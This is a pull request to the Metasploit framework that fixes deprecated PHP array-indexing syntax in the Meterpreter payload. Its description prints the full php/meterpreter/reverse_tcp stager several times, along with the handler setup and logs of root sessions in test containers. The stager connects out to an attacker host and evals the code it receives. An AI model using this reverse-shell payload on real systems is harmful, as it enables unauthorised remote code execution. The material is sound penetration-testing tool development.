### PR TITLE
Stop using deprecated PHP array indexing syntax

### DIFF
--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -780,7 +780,7 @@ function xor_bytes($key, $data) {
   $result = '';
 
   for ($i = 0; $i < strlen($data); ++$i) {
-    $result .= $data{$i} ^ $key{$i % 4};
+    $result .= $data[$i] ^ $key[$i % 4];
   }
 
   return $result;


### PR DESCRIPTION
https://wiki.php.net/rfc/deprecate_curly_braces_array_access

Might fix https://github.com/rapid7/metasploit-framework/issues/14753

# My PHP

```
# php -v                   
PHP 8.0.3 (cli) (built: Mar 31 2021 10:02:58) ( NTS )
Copyright (c) The PHP Group
Zend Engine v4.0.3, Copyright (c) Zend Technologies
```

# Without the patch

Start a handler

```
% ~/opt/metasploit-framework/msfconsole -q -r msf.rc
[!] The following modules could not be loaded!
[!]     /home/justin/opt/metasploit-framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/justin/.msf4/logs/framework.log for details.
[*] Processing msf.rc for ERB directives.
resource (msf.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (msf.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (msf.rc)> set LHOST 172.18.0.7
LHOST => 172.18.0.7
resource (msf.rc)> set LPORT 4444
LPORT => 4444
resource (msf.rc)> set ExitOnSession false
ExitOnSession => false
resource (msf.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...

[*] Started reverse TCP handler on 172.18.0.7:4444
```

Generate a payload

```
% ~/opt/metasploit-framework/msfvenom -p php/meterpreter/reverse_tcp LHOST=172.18.0.7 LPORT=4444     
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
/*<?php /**/ error_reporting(0); $ip = '172.18.0.7'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
```

Save the above to a file, but **remove the `error_reporting(0);`**

Run it

```
# php s2.php 
/*
Fatal error: Array and string offset access syntax with curly braces is no longer supported in /var/www/html/s2.php(1) : eval()'d code on line 783
```

Get a bad session

```
msf6 exploit(multi/handler) > [*] Sending stage (39282 bytes) to 172.18.0.5
[*]  - Meterpreter session 1 closed.  Reason: Died
[*] Meterpreter session 1 opened (172.18.0.7:4444 -> 127.0.0.1) at 2021-04-09 23:07:50 +1000
```

Even though you eventually get a `session 1 opened` it's a dead session.

# With the patch

```
% mv meterpreter.php ~/opt/metasploit-framework/data/meterpreter

% ~/opt/metasploit-framework/msfconsole -q -r msf.rc            
[!] The following modules could not be loaded!
[!]     /home/justin/opt/metasploit-framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/justin/.msf4/logs/framework.log for details.
[*] Processing msf.rc for ERB directives.
resource (msf.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (msf.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (msf.rc)> set LHOST 172.18.0.7
LHOST => 172.18.0.7
resource (msf.rc)> set LPORT 4444
LPORT => 4444
resource (msf.rc)> set ExitOnSession false
ExitOnSession => false
resource (msf.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...

[*] Started reverse TCP handler on 172.18.0.7:4444 
msf6 exploit(multi/handler) > 
```

Re-run the previously generated payload

```
root@4e5f23dbf9b7:/var/www/html# php s2.php 
/*
```

Get and interact with the session

```
msf6 exploit(multi/handler) > WARNING: Local file /home/justin/opt/metasploit-framework/data/meterpreter/meterpreter.php is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (39282 bytes) to 172.18.0.5
[*] Meterpreter session 1 opened (172.18.0.7:4444 -> 172.18.0.5:53464) at 2021-04-09 23:09:11 +1000

msf6 exploit(multi/handler) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root (0)
```

:partying_face: 

# Sessions also open under older PHPs

## 7

```
% sudo -g docker docker run --rm -ti php:7 php -a
Interactive shell

php > echo phpversion();
7.4.16

php > /*<?php /**/ $ip = '172.18.0.7'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
```

```
[*] Sending stage (39282 bytes) to 172.18.0.9
[*] Meterpreter session 3 opened (172.18.0.7:4444 -> 172.18.0.9:43514) at 2021-04-09 23:12:29 +1000

msf6 exploit(multi/handler) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: root (0)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.18.0.9 - Meterpreter session 3 closed.  Reason: User exit
```

## 5

```
% sudo -g docker docker run --rm -ti nimmis/apache-php5 php -a
Interactive mode enabled

php > echo phpversion();
5.5.9-1ubuntu4.29php > 
php > /*<?php /**/ $ip = '172.18.0.7'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
```

```
[*] Sending stage (39282 bytes) to 172.18.0.9
[*] Meterpreter session 9 opened (172.18.0.7:4444 -> 172.18.0.9:43788) at 2021-04-09 23:23:01 +1000

msf6 exploit(multi/handler) > sessions -i -1
[*] Starting interaction with 9...

meterpreter > getuid
Server username: root (0)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.18.0.9 - Meterpreter session 9 closed.  Reason: User exit

```

# Functional testing

I only tested the opening of sessions and the execution of `getuid` but I don't see why this patch would introduce any functional breakage
